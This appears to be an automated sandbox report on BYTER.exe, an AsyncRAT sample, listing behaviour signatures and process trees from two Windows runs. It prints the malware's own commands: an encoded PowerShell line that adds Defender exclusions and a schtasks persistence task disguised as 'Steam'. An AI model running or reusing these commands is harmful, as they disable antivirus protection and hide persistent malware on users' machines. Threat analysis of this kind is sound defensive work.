Malware Analysis Report

2024-09-22 07:46

Sample ID 240603-h5597sfh6z
Target BYTER.exe
SHA256 ceb87fb8fc18a0699bac5b532cfdad64cfdf755efccb03b2571679460b465724
Tags
asyncrat default execution rat
score
10/10

Analysis Overview

Threat Level: Known bad

The file BYTER.exe was found to be: Known bad.

Malicious Activity Summary

asyncrat default execution rat

AsyncRat

Async RAT payload

Loads dropped DLL

Checks computer location settings

Executes dropped EXE

Enumerates physical storage devices

Command and Scripting Interpreter: PowerShell

Unsigned PE

Uses Task Scheduler COM API

Creates scheduled task(s)

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Delays execution with timeout.exe

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-03 07:20

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-03 07:20

Reported

2024-06-03 07:23

Platform

win10v2004-20240508-en

Max time kernel

6s

Max time network

96s

Command Line

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

Signatures

AsyncRat

rat asyncrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4376 wrote to memory of 3732 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4376 wrote to memory of 3732 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4376 wrote to memory of 3732 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4376 wrote to memory of 4772 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 4376 wrote to memory of 4772 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 4376 wrote to memory of 4772 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 4376 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 4376 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 4772 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4772 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4772 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4772 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 4772 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 4772 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 4772 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 4772 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 4488 wrote to memory of 4788 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4488 wrote to memory of 4788 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4488 wrote to memory of 4788 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4488 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 4488 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 4488 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 4488 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 4488 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 2628 wrote to memory of 4832 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 4832 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 4832 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 4460 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 2628 wrote to memory of 4460 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 2628 wrote to memory of 4460 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 2628 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2628 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4460 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4460 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4460 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4460 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 4460 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 4460 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 4460 wrote to memory of 4616 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 4460 wrote to memory of 4616 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 876 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 876 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 876 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 876 wrote to memory of 3612 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 876 wrote to memory of 3612 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 876 wrote to memory of 3612 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 876 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 876 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 3612 wrote to memory of 4412 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3612 wrote to memory of 4412 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3612 wrote to memory of 4412 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2280 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe C:\Windows\System32\cmd.exe
PID 2280 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe C:\Windows\System32\cmd.exe
PID 2280 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe C:\Windows\system32\cmd.exe
PID 2280 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe C:\Windows\system32\cmd.exe
PID 3612 wrote to memory of 3188 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\System32\Conhost.exe
PID 3612 wrote to memory of 3188 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\System32\Conhost.exe
PID 3612 wrote to memory of 3188 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\System32\Conhost.exe
PID 3612 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 3612 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 2168 wrote to memory of 1028 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2168 wrote to memory of 1028 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2360 wrote to memory of 3092 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 2360 wrote to memory of 3092 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"' & exit

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp4A67.tmp.bat""

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"'

C:\Windows\system32\timeout.exe

timeout 3

C:\Users\Admin\AppData\Roaming\Steam.exe

"C:\Users\Admin\AppData\Roaming\Steam.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"'

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe

"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe"

Network

Files

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s1kgkasq.c02.ps1

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MAIN.exe.log

C:\Users\Admin\AppData\Local\Temp\tmp4A67.tmp.bat

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\settings\PreSignInSettingsConfig.json

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VLW1SL5J\update100[1].xml

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-03 07:20

Reported

2024-06-03 07:24

Platform

win7-20240221-en

Max time kernel

150s

Max time network

141s

Command Line

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

Signatures

AsyncRat

rat asyncrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Steam.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2112 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2112 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 2112 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 2644 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2644 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 2644 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 2568 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2568 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 2568 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 2516 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3044 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe C:\Windows\system32\WerFault.exe
PID 2456 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe C:\Windows\system32\WerFault.exe
PID 2516 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 2516 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 2528 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2528 wrote to memory of 1052 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\system32\conhost.exe
PID 2528 wrote to memory of 920 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 3044 -s 564

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2456 -s 564

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-974993620-1938430478-38908114-385171956-1942359032166037379948395595-2097600350"

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1366695945-1939044485-405268087542048551567893023-120042430913678080031225512765"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"' & exit

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp4CB9.tmp.bat""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "20005721183767610092050384264-3432325021216569752-1480255568-1031908428-645852718"

C:\Windows\system32\timeout.exe

timeout 3

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "Steam" /tr '"C:\Users\Admin\AppData\Roaming\Steam.exe"'

C:\Users\Admin\AppData\Roaming\Steam.exe

"C:\Users\Admin\AppData\Roaming\Steam.exe"

C:\Windows\system32\cmd.exe

